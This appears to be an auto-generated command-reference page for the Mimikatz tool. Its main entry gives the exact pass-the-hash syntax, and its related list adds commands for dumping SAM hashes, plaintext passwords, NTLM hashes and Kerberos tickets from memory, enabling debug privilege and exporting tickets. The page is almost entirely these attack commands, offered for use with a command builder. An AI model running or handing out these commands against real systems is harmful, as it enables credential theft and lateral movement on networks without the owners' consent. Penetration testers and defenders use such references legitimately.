mimikatz
Verified for current stable LTS
Mimikatz Command: Pass The Hash Ntlm Windows
Use for pass the hash ntlm windows with Mimikatz. Exact CLI syntax to pass the hash ntlm windows using Mimikatz.
When to use this: Use for pass the hash ntlm windows with Mimikatz.
Command Syntax
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<cmd>" mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<cmd>" Live Command Builder
Final Command
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<cmd>" Command Breakdown
mimikatz is the base executable for this command.
FAQ
Purpose: Exact syntax to pass the hash ntlm windows using Mimikatz.
Test path: Replace placeholders and run destructive commands in a disposable workspace first.
Flag behavior: Tool version, platform, and shell can change behavior.
Improve This Command
Suggest a correction, safer default, or version-specific note for this entry.
Related Operations
Mimikatz Command: Dump Local Sam Database Hashes Windows
mimikatz "lsadump::sam" Mimikatz Command: Dump Plaintext Passwords Ntlm Hashes Kerberos Tickets mimikatz "sekurlsa::logonpasswords" Mimikatz Command: Enable Debug Privileges Windows mimikatz "privilege::debug" Mimikatz Command: Exit Mimikatz Interactive Mode exit Mimikatz Command: Extract Kerberos Tickets Export To File mimikatz "kerberos::list /export"